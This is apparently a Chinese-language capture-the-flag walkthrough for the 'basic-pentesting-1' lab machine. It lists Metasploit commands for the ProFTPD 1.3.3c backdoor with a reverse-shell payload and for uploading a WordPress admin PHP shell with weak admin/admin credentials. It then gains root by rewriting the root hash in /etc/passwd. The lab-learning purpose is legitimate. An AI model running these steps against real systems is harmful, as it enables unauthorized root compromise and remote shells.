原文地址:https://www.payload.com.cn/
basic-pentesting-1
下載地址:
獲取ip地址
端口掃描,服務識別
根據服務版本搜索相關漏洞
經過查看漏洞利用代碼咱們知道該漏洞利用模塊在msf中已有
因而使用msf 搜索漏洞模塊並利用
use exploit/unix/ftp/proftpd_133c_backdoor
set rhosts 192.168.88.197
set lhost 192.168.88.174
set payload cmd/unix/reverse
exploit
直接得到root權限。
固然還有一個80端口,咱們也能夠嘗試從web去突破
嘗試發現一些目錄
在目錄/secret/ 下是wordpress 網站
嘗試訪問,發現存在頁面重定向
將網站ip 域名 寫入本地hosts 文件,從新訪問網站
熟悉的界面
直接進入後臺登陸界面
直接admin、admin 弱口令進入後臺管理界面,免去了爆破的麻煩!
在得到訪問權限的前提下經過msf 上傳 shellcode
use exploit/unix/webapp/wp_admin_shell_upload
set lhost 192.168.88.174
set rhost 192.168.88.197
set targeturi /secret/
set username admin
set password admin
exploit
能夠看到成功上傳了php後門,並得到web權限
接下來提權
meterpreter > edit /etc/passwd meterpreter 下的edit 相似vim ,而且咱們能夠編輯/etc/psswd
root:x:0:0:root:/root:/bin/bash 第二位x 是密碼佔位符,密碼加密存儲在/etc/shadow,
咱們能夠假設,此處x 位 密碼存在,那麼root 就會默認密碼爲x位。就不會去讀取/etc/shadow.
生成密碼
openssl passwd -1
密碼:admin
$1$ke/.AFq7$ykvmZ9loFhFpsOCZfJ84q1
用生成的密碼替換 root的密碼
:wq! 保存
shell
進入完整性shell
python -c 'import pty; pty.spawn("/bin/bash")'
su root
輸入密碼 admin
獲取root權限